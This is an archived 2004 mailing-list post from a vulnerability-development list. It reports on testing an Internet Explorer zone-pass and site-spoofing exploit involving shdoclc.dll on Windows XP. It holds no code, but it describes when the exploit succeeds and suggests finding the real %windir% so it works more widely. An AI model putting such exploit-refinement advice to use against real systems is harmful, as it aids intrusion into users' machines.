Vulnerability Development mailing list archives

FW: Windows XP Prof and shdoclc.dll - zone-pass and site spoofing

From: "V. Poddubnyy" <vpoddubniy () mail ru>
Date: Wed, 14 Jul 2004 21:45:47 +0400

Hi!

A little update: it was without changing your URL to point to the real
shdoclc.dll and under Normal user account. Under Administrator the disk was
renamed, under Normal user I don't have permission to rename disks.

So exploit works with those people who are browsing as administrators and
setup windows to the default directory AND who always press 'Yes' in
security warnings. You really need to find a way to get real %windir% for
exploit to work. Good luck!

Regards,
 Vladimir